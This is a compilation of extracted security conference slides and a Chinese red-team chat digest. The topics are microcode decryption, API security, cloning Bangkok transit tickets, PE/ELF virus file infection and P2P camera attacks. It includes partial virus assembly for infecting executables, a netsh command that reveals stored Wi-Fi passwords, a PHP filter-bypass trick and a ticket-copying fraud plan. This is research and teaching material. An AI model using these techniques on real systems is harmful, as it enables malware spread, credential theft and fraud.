GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
RC4 key
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
RC4 key
discard first
0x200 bytes
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
RC4 key
discard first
0x200 bytes
decrypt
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
RC4 key
discard first
0x200 bytes
decrypt
SHA256
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
RC4 key
discard first
0x200 bytes
decrypt
SHA256
RSA verify
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
GLM µcode update algorithm
metadata nonce RSA mod RSA exp RSA sig ucode patch
wrmsr
move ucode patch to 0xfeb01000
SHA256
check
check
nonce CPU secret
CPU secret
key expansion
RC4 key
discard first
0x200 bytes
decrypt
SHA256
RSA verify
parse ucode!
25
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (1/2)
The temporary physical address where µcode is decrypted.
26
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (1/2)
The temporary physical address where µcode is decrypted.
> sudo cat /proc/iomem | grep feb00000
:(
26
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (1/2)
The temporary physical address where µcode is decrypted.
> sudo cat /proc/iomem | grep feb00000
:(
> read physical address 0xfeb01000
00000000: ffff ffff ffff ffff ffff ffff ffff ffff
00000010: ffff ffff ffff ffff ffff ffff ffff ffff
00000020: ffff ffff ffff ffff ffff ffff ffff ffff
00000030: ffff ffff ffff ffff ffff ffff ffff ffff
26
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (2/2)
• Dynamically enabled by the CPU
27
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (2/2)
• Dynamically enabled by the CPU
• Access time: about 20 cycles
27
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (2/2)
• Dynamically enabled by the CPU
• Access time: about 20 cycles
• Content not shared between cores
27
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (2/2)
• Dynamically enabled by the CPU
• Access time: about 20 cycles
• Content not shared between cores
• Can fit 64-256Kb of valid data
27
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (2/2)
• Dynamically enabled by the CPU
• Access time: about 20 cycles
• Content not shared between cores
• Can fit 64-256Kb of valid data
• Replacement policy on the content?!
27
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
What is address 0xfeb01000 (2/2)
• Dynamically enabled by the CPU
• Access time: about 20 cycles
• Content not shared between cores
• Can fit 64-256Kb of valid data
• Replacement policy on the content?!
• It’s a special CPU view on the L2 cache!
27
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Parsing µcode updates
00000000: 0102 007c 3900 0a00 3f88 4bed c000 080c
...|9...?.K.....
00000010: 0b01 4780 0000 0a00 3f88 4fad 0003 0a00
..G.....?.O.....
00000020: 2f20 4b2d 8002 080c 0322 4740 a903 0a00
/ K-....."G@....
00000030: 2f20 4f6d 1902 0002 0353 6380 c000 3002
/ Om.....Sc...0.
00000040: b8a6 6be8 0000 0002 0320 63c0 0003 f003
..k...... c.....
00000050: f8a6 6b28 c000 0800 03c0 0bed 0000 0b10
..k(............
00000060: 7f00 0800 8001 3110 0300 a140 c000 310c
[email protected].
00000070: 0300 0700 0000 4012 0b30 6210 0003 4b1c
[email protected].
00000080: 7f00 0440 c000 3112 0310 2400 0000 310c
[email protected]...$...1.
00000090: 0300 01c0 0003 0800 03c0 0fad 0002 00d2
................
28
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Parsing µcode updates
A µcode update is bytecode: the CPU interprets commands from the µcode update
reset
write µcode
hook match
& patch
write stgbuf
write uram
CRBUS
cmd
control flow
directives
nested decrypt
(e.g., XuCode)
29
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode decryptor
• Create a parser for µcode updates
30
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode decryptor
• Create a parser for µcode updates
• Automatically collect existing µcode (s) for GLM
30
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode decryptor
• Create a parser for µcode updates
• Automatically collect existing µcode (s) for GLM
• Decrypt all GLM updates
30
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
µcode decryptor
• Create a parser for µcode updates
• Automatically collect existing µcode (s) for GLM
• Decrypt all GLM updates
github.com/pietroborrello/CustomProcessingUnit/ucode_
collection
30
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Bonus Content 1: Skylake perf traces
31
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Bonus Content 2: An APIC failed exploit
µcode update
Use:
0xfeb01000
L2 Cache MMIO
0xfeb00000
32
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Bonus Content 2: An APIC failed exploit
µcode update
Use:
0xfeb01000
APIC MMIO
0xfee00000
L2 Cache MMIO
0xfeb00000
32
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Bonus Content 2: An APIC failed exploit
µcode update
Use:
0xfeb01000
L2 Cache MMIO
0xfeb00000
APIC MMIO
0xfeb01000
32
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Conclusion
• Deepen understanding of modern CPUs with µcode access
33
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Conclusion
• Deepen understanding of modern CPUs with µcode access
• Develop a static and dynamic analysis framework for µcode:
33
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Conclusion
• Deepen understanding of modern CPUs with µcode access
• Develop a static and dynamic analysis framework for µcode:
• µcode decompiler
• µcode assembler
• µcode patcher
• µcode tracer
33
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90)
Conclusion
• Deepen understanding of modern CPUs with µcode access
• Develop a static and dynamic analysis framework for µcode:
• µcode decompiler
• µcode assembler
• µcode patcher
• µcode tracer
• Let’s control our CPUs!
github.com/pietroborrello/CustomProcessingUnit
33
Pietro Borrello (@borrello pietro)
Martin Schwarzl (@marv0x90) | pdf |
© 2021 Akamai | Confidential
1
解码API安全
威胁、挑战和最佳实践
无处不在的API
API是数字化体验的中⼼
•
移动应⽤
•
⽹站和应⽤程序依赖于 API 来实现核⼼功(例
如登录)
•
基于微服务的现代架构
•
API使得多⽤户体验更强⼤
•
法规要求使⽤Web API
(如PSD2 / Open Banking)
API
WEB应用攻击的 演进
Time
Complexity
Web应用攻击
•
DoS
•
Unvalidated Input
•
Authentication
•
Code execution
对Web应用和基
础设施的攻击
•
Buffer overflow
•
DoS/DDoS
•
XSS & SQLi
•
Zero trust
针对web应用、基础设施、API
和浏览器的多种攻击方式
•
Bots
•
API threats
•
Client-side threats
•
Multi-vector DDoS
•
Phishing (Use of DGA)
借助智能化和自动化的编排工具,
通过武器化的机器学习算法和AI
技术进行多种的攻击方式
Deep learning and AI
TODAY
© 2021 Akamai | Confidential
4
API 攻击 - 是攻击者的最佳选择
和传统攻击模式相比,API具有更
好的攻击效果和更低廉的成本
4X
利用API的更多的撞库
攻击
API有更多的安全问
题和更多的脆弱性
© 2021 Akamai | Confidential
5
不断增长的API安全的重要性
多云混合环境
微服务架构
SaaS / IaaS / PaaS
移动
API的增长 - Akamai
•
API 请求占所有流量的83%
•
API 的年增长为 30%
•
在2024年API的调用将达到 42 Trillion
“By 2022, API abuses will be the
most-frequent attack vector resulting
in data breaches for enterprise web
applications.”
- Gartner Research, “How to Build an Effective API Security Strategy”
2021 – API Vulnerabilities disclosed for
GraphQL Security, Facebook, YouTube,
NoxPlayer, Clubhouse, healthcare apps,
VMWare & Microsoft etc.
- APISecurity.io is a community website for all things related to API
security
更多的应用和逻辑迁移到云端
更强调创新的速度和敏捷性
API的可视化一直是一个大问题
缺乏日志和监控
组织经常低估API的威胁
§
低估影响
§
不充分的访问限制
§
采用过时的防护方法
§
没有API的报告
§
由于合作伙伴生态环境的集成经常低
估风险
为什么API的安全如此严峻?
© 2021 Akamai | Confidential
7
了解API的攻击界面
由于第三方API的集成导致的风险的增加
利用JSON/XML和Parser的攻击不断增长,并且导致
了严重的业务中断
基于API的应用是HTML应用的3倍之多
攻击者利用了脆弱的认证和授权的实现
注入类型的攻击始终相关和普遍
攻击界面在转换
Specific attacks on
JSON / XML and
parser based
Application
vulnerabilities
3rd party integration
Login abuse
DoS / DDoS
Auth
Unauthorized use
API
© 2021 Akamai | Confidential
8
撞库
DDoS
通过突发的分布式请求
来淹没API的端点
API 解析
通过Hash碰撞或者反
序列化的方法攻击API
语法解析的能力
畸形的API请求
对API输入的数据进行
模糊测试,并对API
schema进行深度嵌套
应用漏洞
在JSON/XML负载中
嵌入SQLi,XSS脚本
利用已知漏洞进行攻
击
认证和授权
通过失效的对象级授
权和失效的认证绕过
认证和授权的控制
API攻击类型
认证
可用性
API暴露和授权问题
token / cookie
提取
© 2021 Akamai | Confidential
9
调查问卷1:
您的单位都遭受过哪一类的API安全威胁?
o
撞库
o
DDoS
o
畸形的API请求
o
应用漏洞
o
认证和授权
关注二维码,了解更多信息
暴露API参数
购买凭证
诈骗犯
验证凭证
僵尸网络
Usernam
e
Passwor
d
LO
GIN
Usernam
e
Passwor
d
LO
GIN
Usernam
e
Passwor
d
LO
GIN
登录API
客户侧
买票、薅羊毛
忠实用户
个人信息
经济获益
个人信息和奖励积分
凭证滥用
账户接管
凭证泄露
APIs – 令人垂涎的凭证滥用的目标
| 在2018-2020间, 出现了1000亿次的攻击
© 2021 Akamai | Confidential
12
针对API的凭证滥用处于增长趋势
| 在2018-2020期间, 出现1000亿次攻击. 每一年复杂度和攻击量都在增加
凭证滥用带来的损失高达
$22.8million
60%_新的僵尸活动都会涉及到凭证窃取
每
30
有一位身份被窃取的受害者
秒
金融服务中的凭证滥用
API被利用是其他行业的4倍之多
例 #1:
API 风险暴露在商业生态环境中
源站回应
用户请求
SaaS合作伙伴
API请求在SaaS合作伙伴和源站间进行交互
API 风险暴露在商业生态环境中
针对SaaS合作方的DDoS攻击
如果单单依靠合作伙伴的安全措施,源站很难得以保障
源站
DDoS攻击
SaaS合作伙伴
例 #2: 数据通过API的响应被泄露
开发人员经常假设系统将按预期使用
“只有我的手机APP呼叫我的API”
curl https://api.orderinput.com/v1/sku\
-u sku_4bC39lelyjwGarjt:\
-d currency=usd\
-d inventory [type]=finite\
-d inventory[quantity]=500\-d price=3\
-d product=prod_BgrChzDbl\
-d attributes[size]=medium]
http 200 OK
https ://success.api.orderinput.com/v1/sku
-id order_number=14586
1
简单的订单会请求订单条目API
2
API的回应包括了一些有趣的数据
例 #2: 数据通过API的响应被泄露
开发人员很少考虑攻击场景,尤其是非传统场景。
“连续的订单号是有意义的”
但如果我在不同的时间和地域提交后续订单呢?
http 200 OK
https ://success.api.orderinput.com/v1/sku
-id order_number=23697
例 #3: 对微服务架构的攻击
DevOps 通过API功能在云端实现⾃动化
开发者在GitHub上共享代码
Code Sharing
GitHub
IT
Dev
Ops
Microservice
Microservice
API
Microservice
Microservice
API
攻击者是如何识别企业的API?
Step 1
扫描典型主机名
Hostnames
auth.
api.
developer.
download.
IP Addresses
xxx.xxx.xxx.xxxx
xx.xxx.xxx.xxx
xxx.xxx.xxx.xxx
xxx.xxx.xxx.xxx
Step 2
反向解析 +/- 10 IP地址
This Photo by Unknown Author is licensed
under CC BY-SA
List of
Hostnames
to attack
• Fierce是一个域名发现工具
Gitrob 工具:
发现并移除GitHub上的敏感数据
• 按单位搜索
• 标记感兴趣的内容,如:
o 私钥
o ⽤户名
o 邮件地址
o 内部系统信息
全套服务工具,以识别企业网络内部信息从而用于API攻击,
网络钓鱼活动和社会工程攻击
Source: https://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/
例 #3: 对微服务架构的攻击
• 在Git上发布的共享的样本代码
• 敏感的API密钥包含在样本中
• 利⽤API秘钥来获得非认证的访问
Code Sharing
GitHub
IT
Dev
Ops
Microservice
Microservice
API
Microservice
Microservice
API
© 2021 Akamai | Confidential
22
ENCRYPTION
RATE
THROTTLING
VISIBILITY
ACCESS
CONTROL
API GOVERNANCE
SIGNATURE
BASED
传统方法
现有API安全策略
API TESTING
APP SECURITY
现有差距
© 2021 Akamai | Confidential
23
调查问卷2:
您的单位现有的API的安全策略?
o
ACCESS CONTROL
o
SIGNATURE
o
RATE THROTTLING
o
VISIBILITY
o
API GOVERNANCE
关注二维码,了解更多信息
© 2021 Akamai | Confidential
24
In Security, Insights matter
360 view of threats targeting businesses is needed
“与传统的web应用程序相比,API往往会公开更多
的端点,因此制定适当的和更新的资源清单就非常
重要。”
- OWASP API Security Project
© 2021 Akamai | Confidential
25
API安全从可见性开始
防护基于API的DDoS和注入攻击,实施
API的认证和授权
保护和管理
自动检测流量,发现未被保护的API端
点,并提供可行性的工作流程来快速应
用防护措施
交付
提升API流量的规模和性能
发现
•
流量优化
•
API 优先从⽽解决超载问题
•
对峰值事件进⾏API性能负载测试
发现并对不知道的和变化的API进⾏画像 (包
括API端点, 定义, 资源, 和流量特征)
快速响应对于系统和应⽤的API攻击,从⽽
避免宕机时间和数据窃取。
© 2021 Akamai | Confidential
26
抵御API威胁,降低API风险
挑战和方案
最佳实践
●
使用高级bot检测(登录确认)
●
使用API网关进行认证、授权和API访问管理
●
WAF的主动和被动防御模型(API规则检测)
●
API流量行为发现,提供快速和WAF/DDoS
的集成
API泄露
凭证滥用
授权和认证
挑战
API 搜刮和数据窃取
© 2021 Akamai | Confidential
27
Overview
1
合法流量和恶意流量通过Akamai智能边缘平台访问API
服务
API安全是常常被忽略的问题!会使你遭受恶意攻击"数据
泄露和利润及品牌价值受损#Akamai解决方案保护您的
API免受DDoS"应用层以及撞库的攻击#API 防护加强边
缘安全能力!跨跃广大和纷杂的攻击界面!保障业务安全#
2
边缘服务器自动检测和防护应用层DDoS攻击!
3
利用Akamai平台的威胁情报对攻击行为打分并采取相
应的措施!
5
Bot Manager防护利用API产生的爬虫类的攻击。
6
SSL/TLS加密保证传输过程中敏感数据外泄!
7
API 网关验证API请求确保合法用户访问API资源!
DDoS
Protection
Authentication
& authorization
扩展及加速
发现及防护
管控和控制
Bot
Server
App
Attacker
Browser
Edge platform
1
Service
Service
Data center
Cloud data center
Service
JSON
/XML
GraphQL
/REST
数据整合及分析
8
边缘API的缓存可以提高性能并减少基础设施和带宽成
本
BOT Manager
Reputation
Control
WAF Rule
Inspection/API Query
Constraints
Edge
caching
SIEM
Integration
2
3
4
7
8
SSL/TLS
encryption
6
合法流量
恶意流量
5
9
9
实时获取"保留并传递安全信息和事件到SIEM平台
4
自动检测API请求中的恶意内容并进行阻断!主动安全
模式#根据API的规范保护数据获取和插入!保护后端
微服务和应用免受DoS攻击!
抵御API威胁,降低API风险
参考架构 : API 发现和安全
© 2021 Akamai | Confidential
28
发现
保护
分析
API安全检查表
•
API 生态
•
聚焦测试
•
发布和回退设计和策略
•
用户身份
•
DoS/DDoS
•
主动和被动防御模式
•
通过API管理来优化API安全
•
风险评估
•
API测量
•
API审计
© 2021 Akamai | Confidential
29
资料下载
• How Akamai Helps to Mitigate the OWASP API Security Top 10
Vulnerabilities
https://www.akamai.com/us/en/multimedia/documents/white-paper/how-akamai-helps-to-
mitigate-the-owasp-api-security.pdf
•
Web 应用程序和 API 保护功能检查清单
https://www.akamai.com/cn/zh/multimedia/documents/white-paper/web-application-and-
api-protection-capabilities-checklist.pdf
•
Strategies for API Security
https://www.akamai.com/us/en/multimedia/documents/white-paper/akamai-strategies-for-
api-security-white-paper.pdf
•
加速、保护以及管理 API
https://www.akamai.com/cn/zh/solutions/performance/apis.jsp
•
Akamai最新一期互联网现状报告
https://www.akamai.com/cn/zh/multimedia/documents/state-of-the-internet/soti-security-
phishing-for-finance-report-2021.pdf
© 2021 Akamai | Confidential
30
关注二维码,了解更多信息 | pdf |
DefCon 27, Las Vegas 2019
Breaking the back end!
Gregory Pickett, CISSP, GCIA, GPEN
Chicago, Illinois
[email protected]
Hellfire Security
Overview
Transit System
Reverse Engineering
My Discoveries
The Exploit
The Lessons
How This Is Different
This is not illegal
We aren’t sneaking into the station
We aren’t hacking their terminals
We aren’t social engineering anyone or attacking
their wired/wireless network
This is not about the hardware
We aren’t cracking anyone’s encryption
We aren’t cloning the magstripe, RFID, or NFC
How This Is Different
This Is About
Flaws in the Application Logic
OK. Cloning is involved but it is not the
vulnerability exploited
Using AppSec to attack Complex Multi-Layered
Real World Solutions
Elevated Train
Bangkok Mass Transit System (BTS)
Elevated rapid transit system in Bangkok,
Thailand
Serves Greater Bangkok Area
Operated by Bangkok Mass Transit System PCL
(BTSC)
43 stations along two lines
Tickets
Stored-Value Card (NFC)
All Day Pass (Magstripe) and Single Journey
(Magstripe)
Two magstripes
Hole through one magstripe
Only 0.27mm thick
Tickets
Tickets
Tickets
The Equipment
Standard Reader/Writer
Manufactured in China
Standards or Raw Read
Errors Rare
Reliable Performance
Lab Work
Attempted Decode Using Standards
International Organization for Standardization
6-bit Character sets and 4-bit Character sets
Some With Parity and Some Without
Attempted Decode both forwards and
backwards
It wasn’t using the standards
Lab Work
There is no encryption.
There are no parity checks
There was no longitudinal redundancy check
(LRC)
There are no timestamps
Field Work
* The section “7826”” is the Ticket Type
* The section “00FF74” is always 100 + the price of the ticket
* For all day passes, the section “00FF74” is used to track trips taken
Field Work
GUID
GUID
GUID
Station
Dispenser
Station
Turn-style
Field Work
Handling Rules
To Enter,
Ticket must have previously been in “Collected”
State
Ticket Must Be Now Be In “Issued” State
To Exit, Ticket Must Be In “Used” State
Exploiting This System
What We Have Learned So Far
System Safeguards
Their Assumptions
Attacks Against Their Assumptions
Epic Fail!
What We Have Learned So Far
Object Based
Physical Object
Database Object
Properties
Identification
Type
Value
Location
What We Have Learned So Far
States
Issued
Used
Collected
History
System Safeguards
Ticket Composition and Ticket Design
Mirror Physical Object and Database Object
Handling Rules Define Valid Use of The Objects
Lifecycle limited to Twenty-Four Hours
Collection of Ticket After Use
Their Assumptions
No One Will Be Able to Reproduce Our Ticket
Our System Has The Only Valid Objects
Handling Rules Will Prevent Concurrent Use
Damage is limited by Lifecycle
After Use, Ticket Will Be In Our Possession
Attacks Against Assumptions
Acquire Suitable Ticket
Capture Valid Object
Bypass Rules
Extend the Attack to Increase the Damage
Epic Fail!
Found Someone to Make Blank Tickets
Copied Shit Ton of Objects in “Issued” State
Found Flaw In the Handling Rules
“Collected” State found in Current Lifecycle
Overrides all other states!
Object Always Seen Recently “Collected”
Run The Original Ticket
All Copies Immediately Become Valid
Epic Fail!
X
X
X
Epic Fail!
√
√
√
Epic Fail!
Epic Fail! (Demonstration)
Turning The Exploit Into An Attack
Tickets
Plan
Tickets
The Plan
Buy Ticket (Daily Pass)
Copy Ticket
Use Original
Hand Out Copies
Have Fun!
Repeat Tomorrow!
Results of The Attack
Extend the attack!
Test All Layers of a Solution
Test for Application Issues
Check Your Assumptions
Use Compensating and Mitigating Controls
Avoiding Their Fate
Links
https://wikileaks.org/wiki/Anatomy_of_a_Subway_Hack_2008
https://file.wikileaks.org/file/anatomy-of-a-subway-hack.pdf
https://defcon.org/images/defcon-16/dc16-presentations/anderson-ryan-
chiesa/47-zack-reply-to-mbta-oppo.pdf
https://www.computerworld.com/article/2597509/def-con--how-to-hack-
all-the-transport-networks-of-a-country.html
https://www.cio.com/article/2391654/android-nfc-hack-enables-travelers-
to-ride-us-subways-for-free--researchers-say.html
https://www.youtube.com/watch?v=-uvvVMHnC3c
https://www.blackhat.com/docs/asia-17/materials/asia-17-Kim-Breaking-
Korea-Transit-Card-With-Side-Channel-Attack-Unauthorized-Recharging-
wp.pdf
Links
https://www.msrdevice.com
https://www.msrdevice.com/product/misiri-msr705x-hico-magnetic-card-
reader-writer-encoder-msr607-msr608-msr705-msr706
https://www.alibaba.com/
https://nexqo.en.alibaba.com
http://www.nexqo.com/
https://www.bts.co.th/
http://www.btsgroup.co.th | pdf |
群精华总结 2021-08-26
@只要ID够长,别人就不能看到我,问:
师傅们,复现printnightmare本地提权发现了一个问题,普通用户权限没法提权,也就是没法加载dll,
只有管理员权限才能加载dll提权到system,理论上不应该是user -> system吗?
@wolvez,答:
看看补丁是否打了,dll 放能访问位置,高版本系统自动补丁。
解决:貌似真的是月度补丁的问题,8.10号偷偷更新的。
@王半仙,问:
msf使用exploit/windows/local/persistence生成了权限维持后门,在windows 2008r2中,注销后,注
册表在,文件不见了,各位大佬有遇到的么。
@skrtskrt 答:
复现了 https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.TerminalServe
r::TS_TEMP_PER_SESSION 开了RDP 以后 所有的用户session 的tmp 目录都是 id 如果你从没用RDP 登
录不会有session id 直接到 temp 目录。
https://admx.help/ 这个站可以查许多配置信息 不错
@B1ngDa0 问:
可以通过这俩命令找到用户连接过的配置文件以及wifi的密码 有没什么办法或者命令知道当前是连的哪
个配置文件吗。
@A. 答:
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear
Author: L.N. / Date: 2021-08-26 Produced by AttackTeamFamily
No. 1 / 3 - Welcome to www.red-team.cn
@David 问:
求问个问题,php的任意文件写入,
echo 111 > /root/1.php 可以
echo 失败
echo ""失败
过滤了 <和> 有解吗?
@ShadowMccc答:
@&男儿行?答:
echo -e "\x3C" > 111.txt
@Digg3r 答:
echo -n 一个字符一个字符往里面追加
@David 解决了:
php语法 不用<?php 用<script language=php 解决的 昨天的上传就是这样 拦截<? 也是用的这个
方法解决的
Author: L.N. / Date: 2021-08-26 Produced by AttackTeamFamily
No. 2 / 3 - Welcome to www.red-team.cn
Author: L.N. / Date: 2021-08-26 Produced by AttackTeamFamily
No. 3 / 3 - Welcome to www.red-team.cn | pdf |
Comparison Of File Infection On The
Windows And Linux
lclee_vx / F-13 Labs, lychan25/F-13 Labs
[www.f13-labs.net]
2
Overview
• Introduction
• What is Win32 and ELF32 ?
• The PE File Format and ELF File Format
• Win32 File Infection (Windows Platform) and ELF File Infection (Linux
Platform)
• Demo
• Comments
• References
3
Introduction
• A virus is a program that reproduces its own code by attaching itself to
other executable files in such a way that virus code is executed when the
Infected executable file is executed. [Defined at Computer Knowledge
Virus Tutorial, @Computer Knowledge 2000]
• This section will introduce the common file infection strategy that
virus writers have used over the years on the Windows/Linux platform.
4
Introduction: Win32 and ELF32
Win32 refers to the Application Programming
Interface (API) available in Windows Operating
System
ELF32 standard as a portable object file format
that works on 32-bit Intel Architecture
environments
5
Introduction: PE /ELF File Format
What is Portable Executable (PE) file format?
- Microsoft’s format for 32-bit executables and object files
(DLLs)
- compatible across 32-bit Windows operating systems
6
Introduction: PE /ELF File Format
What is the Executable and Linking Format?
• Part of the ABI
• Streamline software development
• Three main ELF object files.
(Relocatable/Executable/Shared)
• Two views - Executable/Linking
7
Introduction: PE File Format
PE File Layout
8
Introduction: ELF File Format
ELF File Layout
Linking View
Execution View
Demonstration
PE File Infection
10
Demo 1 – PE File Infection
1. Get the delta offset
VirusStart:
call
Delta
Delta:
pop
ebp
mov
ebx, ebp ;ebx=ebp
sub
ebp, offset Delta
2. Get the
Kernel32.dll address
GetK32
proc
push
eax
Step1:
dec
esi
mov
ax, [esi+3ch]
test
ax, 0f000h
jnz
Step1
cmp
esi, [esi+eax+34h]
jnz
Step1
pop
eax
ret
GetK32
endp
11
Demo 1 – PE File Infection
3. Scan Kernel32.dll and
get the address of
others API function
- Scan KERNEL32.DLL and retrieve the address of other API
functions with
Checksum
- Formula:
1. eax=Index into the address of Ordinals
2. Ordinal= eax*2+[AddressOfNameOrdinals]
3. Address of Functions (RVA)=Ordinal*4+[AddressOfFunctions]
4. Scan the target file
in the current directory
DirectoryScan
proc
lea eax, [ebp+offset CurtDirectory]
push eax
push max_path
mov eax, dword ptr [ebp+offset
aGetCurrentDirectoryA
call eax
lea eax, [ebp+offset CurtDirectory]
push eax
mov eax, dword ptr [ebp+offset
aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
ret
DirectoryScan
endp
12
Demo 1 – PE File Infection
5. File Injection with adding
the new section
- Get the File Attributes, File Handle of target file
- Allocate the specified bytes in the heap
- Read the target file and mark the infected file with “chan”
in [PE Header+4ch]
- Add the new section named “lych”
- Copy the virus body into new section
6. Copy the virus body
into
new section
7. Exit and return control
to the host file
13
Demo 1 – PE File Infection
Before PE File Infection
14
Demo 1 – PE File Infection
After PE File Infection
Demonstration
ELF File Infection
16
Demo 2 – ELF File Infection
1. Get the delta offset
_start:
call
Delta
Delta:
pop
ebp
sub
ebp, Delta
2. Control access to a
region of memory
mov
edx, 07h
mov
ecx, 04000h
lea
ebx, [ebp+_start]
and
ebx, 0FFFFF000h
call
SYS_mprotect
Note: All the Linux system call can access with int 80h
17
Demo 2 – ELF File Infection
3. Scan the target file in
current directory
1. Check the file type
//-----------------------
mov
eax, dword [esi]
cmp
eax, 0x464C457F
jne
near UnMap
2. Check the file Infected already?
//--------------
mov eax, dword [ebp+_start]
cmp dword [esi], eax
jz UnMap
4. Check the file type
and infected
already?
18
Demo 2 – ELF File Infection
5. Enough space for Virus
body
1. Check the space for virus body
//----------------------------------
mov eax, dword [edi+14h]
sub
eax, ebx
mov
ecx, VxEnd - _start
cmp
eax, ecx
jb near UnMap
6. Overwriting host code
by viral code
1. Get the value of
a. e_ehsize (elf header size)
b. eh_entrypoint (entry point)
c. eh_ph_count (ph number)
d. eh_ph_entrysize (ph entry size)
2. e_entry < p_addr + p_memsz
3. Write the frame and virus
19
Demo 2 – ELF File Infection
7. Exit and return to the
host program
1. UnMap the ELF file and return to the host program
Note:
The size of ELF file increase
20
Demo 2 – ELF File Infection
Before ELF File Infection
21
Demo 2 – ELF File Infection
After ELF File Infection
22
Conclusions
• The hard times of a Linux binary virus to infect ELF
executables and spread
• Task of propagation in Linux system is made much more
difficult by the limited privileges of the user account
• Its more easier to access and get the Linux System call
with int 80h
23
Reference
•Szor, Peter. Attacks on Win32. Virus Bulletin Conference,
October 1998, Munich/Germany, page 57-84.
•Inside Windows: An In-Depth Look into the Win32 Portable
Executable File Format:
http://msdn.microsoft.com/msdnmag/issues/02/02/PE/defau
.
•Microsoft Portable Executable and Common Object File
Format Specification:
http://www.microsoft.com/whdc/system/platform/firmwa
re/PECOFF.mspx.
24
Reference
• Silvio Cesare, 1999. Unix Viruses
• Billy Belcebu, 1999. Viruses under Linux, Xine – Issue #5
• @Computer Knowledge 2000, 2000. Computer Knowledge
Virus Tutorial
• http://www.f13-labs.net
• http://www.eof-project.net
•Many thanks go to moaphie,izee, skyout, synge,
robinh00d, Invizible etc
-Thank You –
[email protected]
[email protected] | pdf |
Paul Marrapese <[email protected]>
DEF CON 28
Abusing P2P to Hack
3 Million Cameras
What is this talk?
• Overview of "convenience" feature found in millions of IoT devices
• P2P is found in cameras, baby monitors, smart doorbells, DVRs, NASes, alarm systems…
• Hundreds of different brands impacted (supply chain issue)
• How P2P exposes devices to the world
• Devices are instantly accessible, even with NAT/firewalls
• Obscure architecture and protocol (these devices aren't on Shodan!)
• How P2P can be abused to remotely attack devices
• Stealing creds with over-the-Internet MITM attacks
• Exploiting devices behind firewalls to get root shells
$ whoami
• Paul Marrapese (OSCP)
• San Jose, CA
• @PaulMarrapese / [email protected]
• h=ps://hacked.camera
• Red team at a large enterprise cloud company (opinions expressed are solely my own)
• Reverse engineering, music producEon, photography
All good things start with cats.
Cheap cams galore
Cheap cams galore
Shady cams galore!
Shady cams galore!
What is peer-to-peer (P2P)?
• In the context of IoT, a convenience feature for connectivity
• Plug and play: users can instantly connect to devices from anywhere
• Eliminates technical barriers barriers for non-technical users
• No port forwarding required
• No dynamic DNS or remembering IP addresses required
• No UPnP required (P2P is not UPnP)
• Automatically accepts connections, even with NAT/firewall restrictions
• Your cheap camera's gaping security holes are now open to the world. Good luck. 😱
Who provides P2P?
